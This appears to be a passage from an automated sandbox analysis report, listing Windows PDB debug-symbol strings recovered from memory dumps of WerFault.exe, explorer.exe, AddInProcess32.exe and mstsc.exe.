Source: Binary string: \??\C:\Windows.pdb source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Shell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: InputSwitch.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cflapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DataExchange.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: provsvc.pdbuj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Data.Activities.pdbaS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Bcp47mrm.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: usermgrcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
Source: Binary string: SettingMonitor.pdb:uT source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Core.TextInput.pdbIS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Windows.UI.Immersive.pdb5SD source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: prnfldr.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb0t/ source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Networking.Connectivity.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: nsi.pdbRjz source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ActXPrxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.CloudStore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: mlang.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: pcacli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: NotificationControllerPS.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: sppc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: oleacc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wevtapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: framedynos.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: samcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: sspicli.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: UiaManager.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dsreg.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ActionCenter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: msoshext.pdb0 source: WerFault.exe, 0000000A.00000003.747320665.000001EDC8062000.00000004.00000001.sdmp
Source: Binary string: dusmapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cscapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: d3d11.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ShellCommonCommonProxyStub.pdbuS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: MobileNetworking.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: avrt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb{ source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: ShellCommonCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: smartscreenps.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wmiclnt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinui.appcore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: WindowsInternal.ComposableShell.Experiences.Switcher.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: samlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: atlthunk.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: bthprops.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: linkinfo.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscinterop.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: win32u.pdb0 source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
Source: Binary string: mscms.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
Source: Binary string: user32.pdb source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdbn source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Shell.pdbqS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: dxgi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: IconCodecService.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dlnashext.pdbIj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WLIDProv.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: SettingSyncPolicy.pdbQSx source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: winsta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Security.Authentication.Web.Core.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TaskFlowDataEngine.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WscApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryBroker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepository.pdb%St source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: davclnt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: stobject.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: AppResolver.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: dcomp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: NPSM.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: audioses.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: twinui.appcore.pdbUSd source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdb0 source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
Source: Binary string: sapi_onecore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ninput.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: StartTileData.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: PortableDeviceTypes.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: LanguageOverlayUtil.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000A.00000003.740772791.000001EDC777B000.00000004.00000001.sdmp
Source: Binary string: netprofm.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: pnidui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Shell.Broker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: win32u.pdb source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
Source: Binary string: ResourcePolicyClient.pdbMS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: MrmCoreR.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: thumbcache.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PhotoMetadataHandler.pdb]Sl source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
Source: Binary string: ExplorerFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: imm32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: twinui.pcshell.pdb!SH source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cdp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: profapi.pdba source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: InputHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ExplorerFrame.pdbmS< source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntshrui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: drprov.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: IdStore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wpnapps.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PortableDeviceApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: UserMgrProxy.pdbSP source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.722744884.0000000001290000.00000040.00000001.sdmp, mstsc.exe, 00000006.00000002.1032811979.0000000004750000.00000040.00000001.sdmp
Source: Binary string: Windows.Shell.BlueLightReduction.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: TaskFlowDataEngine.pdbeS4 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: propsys.pdbb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: davhlpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dlnashext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Deviceovs.pdb source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
Source: Binary string: EhStorShell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: XmlLite.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
Source: Binary string: WorkFoldersShell.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: batmeter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cscui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DWrite.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ResourcePolicyClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: MFPLAT.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SyncCenter.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ApplicationFrame.pdb=SL source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdbv source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdbh source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000A.00000003.726046312.000001EDC6DF6000.00000004.00000001.sdmp
Source: Binary string: Bcp47Langs.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: rtworkq.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ActionCenter.pdbASh source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ExecModelProxy.pdbES source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: explorer.pdb source: WerFault.exe, 0000000A.00000003.725996524.000001EDC6DEA000.00000004.00000001.sdmp
Source: Binary string: twinui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Shell.Broker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: NPSMDesktopProvider.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: MMDevAPI.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Immersive.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WPDShServiceObj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: capauthz.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: hcproviders.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Wer.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: windows.ui.xaml.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: user32.pdb0 source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
Source: Binary string: wincorlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ntlanman.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
Source: Binary string: IEProxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: devobj.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: policymanager.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WPDShServiceObj.pdb&uX source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: RmClient.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: StructuredQuery.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: UserMgrProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: d2d1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: PhotoMetadataHandler.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SettingSyncPolicy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcp140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msoshext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ES.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows.pdb2R source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: TileDataRepository.pdb-S| source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdbm source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Windows.ImmersiveShell.ServiceProvider.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: framedynos.pdbt8 source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: npmproxy.pdb?jO source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: staterepository.core.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: npmproxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: msxml6.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DataExchange.pdb9S@ source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: cryptngc.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: UIAnimation.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: DXP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000A.00000003.729628969.000001EDC6F2D000.00000004.00000001.sdmp
